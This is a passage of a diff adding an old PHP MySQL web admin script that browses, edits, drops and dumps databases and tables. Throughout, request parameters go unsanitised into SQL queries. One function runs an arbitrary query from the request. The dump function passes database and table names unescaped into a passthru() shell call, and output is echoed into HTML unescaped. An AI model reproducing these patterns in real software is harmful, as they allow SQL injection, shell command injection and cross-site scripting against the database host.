+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+  echo "</td>\n";
+  echo "</tr>\n";
+}
+
+echo "</table>";
+}
+
+function createTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "CREATE TABLE $tablename ( no INT )";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function dropTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "DROP TABLE $tablename";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function viewSchema() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+echo "<h1>Table Schema</h1>\n";
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echoQueryResult();
+
+echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+echo "<hr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+echo "<tr>\n";
+echo "<th>Field</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Null</th>\n";
+echo "<th>Key</th>\n";
+echo "<th>Default</th>\n";
+echo "<th>Extra</th>\n";
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  echo "<tr>\n";
+  echo "<td>".$field["Field"]."</td>\n";
+  echo "<td>".$field["Type"]."</td>\n";
+  echo "<td>".$field["Null"]."</td>\n";
+  echo "<td>".$field["Key"]."</td>\n";
+  echo "<td>".$field["Default"]."</td>\n";
+  echo "<td>".$field["Extra"]."</td>\n";
+  $fieldname = $field["Field"];
+  echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Field</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Field</h1>\n";
+  $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+  $num = mysql_num_rows( $pResult );
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  if( $field["Field"] == $fieldname ) {
+    $fieldtype = $field["Type"];
+    $fieldkey = $field["Key"];
+    $fieldextra = $field["Extra"];
+    $fieldnull = $field["Null"];
+    $fielddefault = $field["Default"];
+    break;
+  }
+  }
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( strpos( $fieldtype, "(" ) ) {
+  if( $type == "enum" | $type == "set" ) {
+    $valuelist = strtok( " ()\n" );
+  } else {
+    $M = strtok( " (,)\n" );
+    if( strpos( $fieldtype, "," ) )
+    $D = strtok( " (,)\n" );
+  }
+  }
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+echo "<form action=$PHP_SELF>\n";
+
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addField_submit>\n";
+else if( $cmd == "edit" ) {
+  echo "<input type=hidden name=action value=editField_submit>\n";
+  echo "<input type=hidden name=old_name value=$fieldname>\n";
+}
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+
+echo "<h3>Name</h3>\n";
+echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Field'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Field'>\n";
+echo "<input type=button value=Cancel onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+  $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+if( $cmd == "add" )
+  $queryStr = "ALTER TABLE $tablename ADD $name ";
+else if( $cmd == "edit" )
+  $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+if( $M != "" )
+  if( $D != "" )
+  $queryStr .= "$type($M,$D) ";
+  else
+  $queryStr .= "$type($M) ";
+else if( $valuelist != "" ) {
+  $valuelist = stripslashes( $valuelist );
+  $queryStr .= "$type($valuelist) ";
+} else
+  $queryStr .= "$type ";
+
+$queryStr .= "$unsigned $zerofill $binary ";
+
+if( $default_value != "" )
+  $queryStr .= "DEFAULT '$default_value' ";
+
+$queryStr .= "$not_null $auto_increment";
+
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+// key change
+$keyChange = false;
+$result = mysql_query( "SHOW KEYS FROM $tablename" );
+$primary = "";
+while( $row = mysql_fetch_array($result) )
+  if( $row["Key_name"] == "PRIMARY" ) {
+  if( $row[Column_name] == $name )
+    $keyChange = true;
+  else
+    $primary .= ", $row[Column_name]";
+  }
+if( $primary_key == "PRIMARY KEY" ) {
+  $primary .= ", $name";
+  $keyChange = !$keyChange;
+}
+$primary = substr( $primary, 2 );
+if( $keyChange == true ) {
+  $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+  $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+}
+
+viewSchema();
+}
+
+function dropField() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewSchema();
+}
+
+function viewData( $queryStr ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+echo "<h1>Data in Table</h1>\n";
+if( $tablename != "" )
+  echo "<p class=location>$dbname &gt; $tablename</p>\n";
+else
+  echo "<p class=location>$dbname</p>\n";
+
+$queryStr = stripslashes( $queryStr );
+if( $queryStr == "" ) {
+  $queryStr = "SELECT * FROM $tablename";
+  if( $orderby != "" )
+  $queryStr .= " ORDER BY $orderby";
+  echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+}
+
+$pResult = mysql_db_query( $dbname, $queryStr );
+$errMsg = mysql_error();
+
+$GLOBALS[queryStr] = $queryStr;
+
+if( $pResult == false ) {
+  echoQueryResult();
+  return;
+}
+if( $pResult == 1 ) {
+  $errMsg = "Success";
+  echoQueryResult();
+  return;
+}
+
+echo "<hr>\n";
+
+$row = mysql_num_rows( $pResult );
+$col = mysql_num_fields( $pResult );
+
+if( $row == 0 ) {
+  echo "No Data Exist!";
+  return;
+}
+
+if( $rowperpage == "" ) $rowperpage = 20;
+if( $page == "" ) $page = 0;
+else $page--;
+mysql_data_seek( $pResult, $page * $rowperpage );
+
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+  echo "</th>\n";
+}
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $rowperpage; $i++ ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  $key = "";
+  for( $j = 0; $j < $col; $j++ ) {
+  $data = $rowArray[$j];
+
+  $field = mysql_fetch_field( $pResult, $j );
+  if( $field->primary_key == 1 )
+    $key .= "&" . $field->name . "=" . $data;
+
+  if( strlen( $data ) > 20 )
+    $data = substr( $data, 0, 20 ) . "...";
+  $data = htmlspecialchars( $data );
+  echo "<td>\n";
+  echo "$data\n";
+  echo "</td>\n";
+  }
+
+  if( $key == "" )
+  echo "<td colspan=2>no Key</td>\n";
+  else {
+  echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+  }
+  echo "</tr>\n";
+}
+echo "</table>\n";
+
+echo "<font size=2>\n";
+echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+echo "<font color=green>\n";
+echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+echo "</font>\n";
+echo " | ";
+if( $page > 0 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Prev</a>\n";
+} else
+  echo "Prev";
+echo " | ";
+if( $page < ($row/$rowperpage)-1 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Next</a>\n";
+} else
+  echo "Next";
+echo " | ";
+if( $row > $rowperpage ) {
+  echo "<input type=text size=4 name=page>\n";
+  echo "<input type=submit value='Go'>\n";
+}
+echo "</form>\n";
+echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Data</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Data</h1>\n";
+  $pResult = mysql_list_fields( $dbname, $tablename );
+  $num = mysql_num_fields( $pResult );
+
+  $key = "";
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+    if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+    else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+  }
+  $key = substr( $key, 0, strlen($key)-4 );
+
+  mysql_select_db( $dbname, $mysqlHandle );
+  $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+  $data = mysql_fetch_array( $pResult );
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echo "<form action='$PHP_SELF' method=post>\n";
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addData_submit>\n";
+else if( $cmd == "edit" )
+  echo "<input type=hidden name=action value=editData_submit>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+echo "<th>Name</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Function</th>\n";
+echo "<th>Data</th>\n";
+echo "</tr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  $fieldname = $field["Field"];
+  $fieldtype = $field["Type"];
+  $len = mysql_field_len( $pResultLen, $i );
+
+  echo "<tr>";
+  echo "<td>$fieldname</td>";
+  echo "<td>".$field["Type"]."</td>";
+  echo "<td>\n";
+  echo "<select name=${fieldname}_function>\n";
+  echo "<option>\n";
+  echo "<option>ASCII\n";
+  echo "<option>CHAR\n";
+  echo "<option>SOUNDEX\n";
+  echo "<option>CURDATE\n";
+  echo "<option>CURTIME\n";
+  echo "<option>FROM_DAYS\n";
+  echo "<option>FROM_UNIXTIME\n";
+  echo "<option>NOW\n";
+  echo "<option>PASSWORD\n";
+  echo "<option>PERIOD_ADD\n";
+  echo "<option>PERIOD_DIFF\n";
+  echo "<option>TO_DAYS\n";
+  echo "<option>USER\n";
+  echo "<option>WEEKDAY\n";
+  echo "<option>RAND\n";
+  echo "</select>\n";
+  echo "</td>\n";
+  $value = htmlspecialchars($data[$i]);
+  if( $cmd == "add" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+  }
+  } else if( $cmd == "edit" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    if( $value == $str )
+      echo "<option selected>$str\n";
+    else
+      echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+  }
+  }
+  echo "</tr>";
+}
+echo "</table><p>\n";
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Data'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Data'>\n";
+echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+mysql_select_db( $dbname, $mysqlHandle );
+if( $cmd == "add" )
+  $queryStr = "INSERT INTO $tablename VALUES (";
+else if( $cmd == "edit" )
+  $queryStr = "REPLACE INTO $tablename VALUES (";
+for( $i = 0; $i < $num-1; $i++ ) {
+  $field = mysql_fetch_field( $pResult );
+  $func = $GLOBALS[$field->name."_function"];
+  if( $func != "" )
+  $queryStr .= " $func(";
+  if( $field->numeric == 1 ) {
+  $queryStr .= $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "),";
+  else
+    $queryStr .= ",";
+  } else {
+  $queryStr .= "'" . $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "'),";
+  else
+    $queryStr .= "',";
+  }
+}
+$field = mysql_fetch_field( $pResult );
+if( $field->numeric == 1 )
+  $queryStr .= $GLOBALS[$field->name] . ")";
+else
+  $queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function deleteData() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+$key = "";
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+  if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+  else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+}
+$key = substr( $key, 0, strlen($key)-4 );
+
+mysql_select_db( $dbname, $mysqlHandle );
+$queryStr =  "DELETE FROM $tablename WHERE $key";
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function dump() {
+global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+if( $action == "dumpTable" )
+  $filename = $tablename;
+else
+  $filename = $dbname;
+
+header("Content-disposition: filename=$filename.sql");
+header("Content-type: application/octetstream");
+header("Pragma: no-cache");
+header("Expires: 0");
+
+$pResult = mysql_query( "show variables" );
+while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  if( $rowArray[0] == "basedir" )
+  $bindir = $rowArray[1]."bin/";
+}
+
+passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+global $PHP_SELF, $command;
+echo "<h1>Utilities</h1>\n";
+if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+  echo "<hr>\n";
+  echo "Show\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+  echo "</ul>\n";
+  echo "Flush\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+  if( $command == "flush_hosts" ) {
+  if( mysql_query( "Flush hosts" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+  if( $command == "flush_logs" ) {
+  if( mysql_query( "Flush logs" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+  if( $command == "flush_privileges" ) {
+  if( mysql_query( "Flush privileges" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+  if( $command == "flush_tables" ) {
+  if( mysql_query( "Flush tables" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+  if( $command == "flush_status" ) {
+  if( mysql_query( "Flush status" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "</ul>\n";
+} else {
+  $queryStr = ereg_replace( "_", " ", $command );
+  $pResult = mysql_query( $queryStr );
+  if( $pResult == false ) {
+  echo "Fail";
+  return;
+  }
+  $col = mysql_num_fields( $pResult );
+
+  echo "<p class=location>$queryStr</p>\n";
+  echo "<hr>\n";
+
+  echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+  echo "<tr>\n";
+  for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>".$field->name."</th>\n";
+  }
+  echo "</tr>\n";
+
+  while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  for( $j = 0; $j < $col; $j++ )
+    echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+  echo "</tr>\n";
+  }
+  echo "</table>\n";
+}
+}
+
+function header_html() {
+global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+color: #FF6000;
+font-size: small;
+}
+h1 {
+color: #0090FF;
+}
+th {
